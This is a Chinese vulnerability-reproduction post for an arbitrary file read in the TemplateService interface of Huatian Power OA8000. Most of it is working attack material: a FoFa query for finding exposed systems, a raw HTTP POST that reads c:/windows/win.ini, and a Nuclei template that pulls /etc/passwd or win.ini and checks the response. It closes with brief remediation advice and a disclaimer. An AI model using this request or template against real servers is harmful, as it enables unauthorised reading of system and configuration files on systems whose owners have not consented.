【漏洞复现】华天动力-TemplateService-任意文件读取

admin 2024年1月2日23:19:29评论87 views字数 1342阅读4分28秒阅读模式

免责声明


【漏洞复现】华天动力-TemplateService-任意文件读取


此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们

【漏洞复现】华天动力-TemplateService-任意文件读取

【漏洞复现】华天动力-TemplateService-任意文件读取

漏洞概述

【漏洞复现】华天动力-TemplateService-任意文件读取

华天动力OA系统中的TemplateService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。

【漏洞复现】华天动力-TemplateService-任意文件读取

【漏洞复现】华天动力-TemplateService-任意文件读取

FoFa

【漏洞复现】华天动力-TemplateService-任意文件读取

app="华天动力-OA8000"

【漏洞复现】华天动力-TemplateService-任意文件读取

漏洞复现

【漏洞复现】华天动力-TemplateService-任意文件读取

POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36Content-Type: text/xmlContent-Length: 101
<buffalo-call><method>getHtmlContent</method><string>c:/windows/win.ini</string></buffalo-call>

【漏洞复现】华天动力-TemplateService-任意文件读取

【漏洞复现】华天动力-TemplateService-任意文件读取

Nuclei Poc

【漏洞复现】华天动力-TemplateService-任意文件读取

id: htdl-TemplateService-readfile
info: name: htdl-TemplateService-readfile author: rain severity: high metadata: fofa-query: app="华天动力-OA8000"http: - raw: - | POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 Content-Type: text/xml Content-Length: 101
<buffalo-call> <method>getHtmlContent</method> <string>{{path}}</string> </buffalo-call>
attack: batteringram payloads: path: - /etc/passwd - c:/windows/win.ini stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - 'contains_all(body,"root:") || contains_all(body,"[fonts]")'

【漏洞复现】华天动力-TemplateService-任意文件读取

修复建议

【漏洞复现】华天动力-TemplateService-任意文件读取

  1. 及时更新OA系统至最新版本,以确保漏洞修复。
  2. 对TemplateService等涉及文件读取的服务进行严格的访问控制,限制其读取文件的权限。
  3. 对系统进行定期安全审计,检查是否存在其他潜在的漏洞。

    

原文始发于微信公众号(知黑守白):【漏洞复现】华天动力-TemplateService-任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月2日23:19:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】华天动力-TemplateService-任意文件读取http://cn-sec.com/archives/2356450.html

发表评论

匿名网友 填写信息